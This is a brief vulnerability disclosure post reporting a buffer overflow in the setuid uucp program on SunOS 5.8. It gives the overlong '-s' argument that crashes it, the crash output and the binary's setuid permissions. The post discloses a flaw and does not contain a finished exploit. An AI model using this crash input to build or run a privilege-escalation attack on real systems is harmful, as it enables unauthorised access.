Hi everybody
Though I dont know if this vulnerability has be discovered previously I
found a buffer overflow in the app uucp of SunOS 5.8 that it could be used
to get privileges of uucp.
Buffer is overflow when the app uucp is executed with the parameter -s
continued of a string bigger than 7525 bytes.
hipnosis% uucp -s `perl -e 'print "A"x7526'`
Segmentation Fault
hipnosis% uucp -s `perl -e 'print "A"x7525'`
hipnosis%
I have not been able to debug the app for see if the registers are
overwrites because i have not any debugger in my machine and i have not
too time.
My system:
hipnosis% uname -a
SunOS averroes 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250
hipnosis%
Suid:
hipnosis% ls -l /usr/bin/uucp
---s--x--x 1 uucp uucp 66940 eno 5 2000 /usr/bin/uucp
hipnosis%
Well, bye everybody
